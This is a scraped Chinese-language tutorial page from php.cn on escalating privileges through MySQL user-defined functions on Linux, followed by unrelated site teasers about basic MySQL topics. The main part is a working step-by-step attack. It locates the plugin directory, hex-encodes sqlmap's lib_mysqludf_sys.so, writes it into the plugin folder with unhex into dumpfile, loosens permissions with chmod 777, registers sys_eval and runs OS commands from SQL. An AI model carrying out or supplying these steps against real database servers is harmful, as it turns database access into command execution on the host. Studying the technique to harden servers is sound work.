Linux UDF Mysql提权_MySQL-Mysql Tutorial-php.cn

Home

Database

Mysql Tutorial

Linux UDF Mysql提权_MySQL

WBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWB

May 31, 2016 am 08:49 AM

环境:

os:linux(bt5)

database:mysql

简述：

通过自定义库函数来实现执行任意的程序，这里只在linux下测试通过，具体到windows，所用的dll自然不同。

要求：

在mysql库下必须有func表，并且在skipgranttables开启的情况下，UDF会被禁止；

过程：得到插件库路径找对应操作系统的udf库文件利用udf库文件加载函数并执行命令

１，得到插件库路径

1234567

mysql> show variableslike"%plugin%";

+---------------+-----------------------+

| Variable_name | Value |

+---------------+-----------------------+

| plugin_dir| /usr/lib/mysql/plugin |

+---------------+-----------------------+

1 rowinset(0.00 sec)

２，找对应操作系统的udf库文件

因为自己测试，看了下自己系统的版本，64位

root@bt:~# uname -a

Linux bt 3.2.6 #1 SMP Fri Feb 17 10:34:20 EST 2012 x86_64 GNU/Linux

对于udf文件，在sqlmap工具中自带就有，只要找对应操作系统的版本即可

123456

root@bt:/pentest/database/sqlmap/udf/mysql# ls

linuxwindows

root@bt:/pentest/database/sqlmap/udf/mysql/linux# ls

root@bt:/pentest/database/sqlmap/udf/mysql/linux/64# ls

lib_mysqludf_sys.so

３，利用udf库文件加载函数并执行命令

首先要得到udf库文件的十六进制格式，可在本地通过

mysql> select hex(load_file('/pentest/database/sqlmap/udf/mysql/linux/64/lib_mysqludf_sys.so')) into outfile '/tmp/udf.txt';

Query OK, 1 row affected (0.04 sec)

因为我测试时，使用自带账户，账户名mysql，并不是root,所以插件目录不可写，而实际中，一般udf提权都是用root权限启动的mysql程序，故，不存在目录权限不足，不能访问的情况。为了继续，修改目录权限

root@bt:~# chmod 777 /usr/lib/mysql/plugin

数据库中写入udf库到mysql库目录:

mysql> select unhex('7F454C46020...') into dumpfile '/usr/lib/mysql/plugin/mysqludf.so';

Query OK, 1 row affected (0.04 sec)

查看下这个udf库所支持的函数

123456789101112131415161718192021222324252627282930313233343536373839404142

root@bt:~# nm -D /usr/lib/mysql/plugin/mysqludf.so

w _Jv_RegisterClasses

A __bss_start

w __cxa_finalize

w __gmon_start__

A _edata

A _end

T _fini

0000000000000ba0 T _init

U fgets

U fork

U free

U getenv

000000000000101a T lib_mysqludf_sys_info0000000000000da4 T lib_mysqludf_sys_info_deinit

T lib_mysqludf_sys_info_init

U malloc

U mmap

U pclose

U popen

U realloc

U setenv

U strcpy

U strncpy

0000000000000dac T sys_bineval0000000000000dab T sys_bineval_deinit0000000000000da8 T sys_bineval_init0000000000000e46 T sys_eval0000000000000da7 T sys_eval_deinit0000000000000f2e T sys_eval_init

T sys_exec

0000000000000da6 T sys_exec_deinit0000000000000f57 T sys_exec_init00000000000010f7 T sys_get0000000000000da5 T sys_get_deinit0000000000000fea T sys_get_init000000000000107a T sys_set00000000000010e8 T sys_set_deinit0000000000000f80 T sys_set_init

U sysconf

U system

U waitpid

最后，加载函数并执行：

123456789101112131415161718

mysql>createfunctionsys_evalreturnsstring soname"mysqludf.so";

Query OK, 0rowsaffected (0.14 sec)

mysql>selectsys_eval('whoami');

+--------------------+

| sys_eval('whoami') |

+--------------------+

| mysql|

+--------------------+

1 rowinset(0.04 sec)

mysql>select*frommysql.func;

+----------+-----+-------------+----------+

|name | ret | dl| type |

+----------+-----+-------------+----------+

| sys_eval | 0 | mysqludf.so |function|

+----------+-----+-------------+----------+

1 rowinset

Statement

The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn

MySQL's Role: Databases in Web ApplicationsApr 17, 2025 am 12:23 AM

The main role of MySQL in web applications is to store and manage data. 1.MySQL efficiently processes user information, product catalogs, transaction records and other data. 2. Through SQL query, developers can extract information from the database to generate dynamic content. 3.MySQL works based on the client-server model to ensure acceptable query speed.

MySQL: Building Your First DatabaseApr 17, 2025 am 12:22 AM

The steps to build a MySQL database include: 1. Create a database and table, 2. Insert data, and 3. Conduct queries. First, use the CREATEDATABASE and CREATETABLE statements to create the database and table, then use the INSERTINTO statement to insert the data, and finally use the SELECT statement to query the data.

MySQL: A Beginner-Friendly Approach to Data StorageApr 17, 2025 am 12:21 AM

MySQL is suitable for beginners because it is easy to use and powerful. 1.MySQL is a relational database, and uses SQL for CRUD operations. 2. It is simple to install and requires the root user password to be configured. 3. Use INSERT, UPDATE, DELETE, and SELECT to perform data operations. 4. ORDERBY, WHERE and JOIN can be used for complex queries. 5. Debugging requires checking the syntax and use EXPLAIN to analyze the query. 6. Optimization suggestions include using indexes, choosing the right data type and good programming habits.

Is MySQL Beginner-Friendly? Assessing the Learning CurveApr 17, 2025 am 12:19 AM

MySQL is suitable for beginners because: 1) easy to install and configure, 2) rich learning resources, 3) intuitive SQL syntax, 4) powerful tool support. Nevertheless, beginners need to overcome challenges such as database design, query optimization, security management, and data backup.

Is SQL a Programming Language? Clarifying the TerminologyApr 17, 2025 am 12:17 AM

Yes,SQLisaprogramminglanguagespecializedfordatamanagement.1)It'sdeclarative,focusingonwhattoachieveratherthanhow.2)SQLisessentialforquerying,inserting,updating,anddeletingdatainrelationaldatabases.3)Whileuser-friendly,itrequiresoptimizationtoavoidper

Explain the ACID properties (Atomicity, Consistency, Isolation, Durability).Apr 16, 2025 am 12:20 AM

ACID attributes include atomicity, consistency, isolation and durability, and are the cornerstone of database design. 1. Atomicity ensures that the transaction is either completely successful or completely failed. 2. Consistency ensures that the database remains consistent before and after a transaction. 3. Isolation ensures that transactions do not interfere with each other. 4. Persistence ensures that data is permanently saved after transaction submission.

MySQL: Database Management System vs. Programming LanguageApr 16, 2025 am 12:19 AM

MySQL is not only a database management system (DBMS) but also closely related to programming languages. 1) As a DBMS, MySQL is used to store, organize and retrieve data, and optimizing indexes can improve query performance. 2) Combining SQL with programming languages, embedded in Python, using ORM tools such as SQLAlchemy can simplify operations. 3) Performance optimization includes indexing, querying, caching, library and table division and transaction management.

MySQL: Managing Data with SQL CommandsApr 16, 2025 am 12:19 AM

MySQL uses SQL commands to manage data. 1. Basic commands include SELECT, INSERT, UPDATE and DELETE. 2. Advanced usage involves JOIN, subquery and aggregate functions. 3. Common errors include syntax, logic and performance issues. 4. Optimization tips include using indexes, avoiding SELECT* and using LIMIT.

See all articles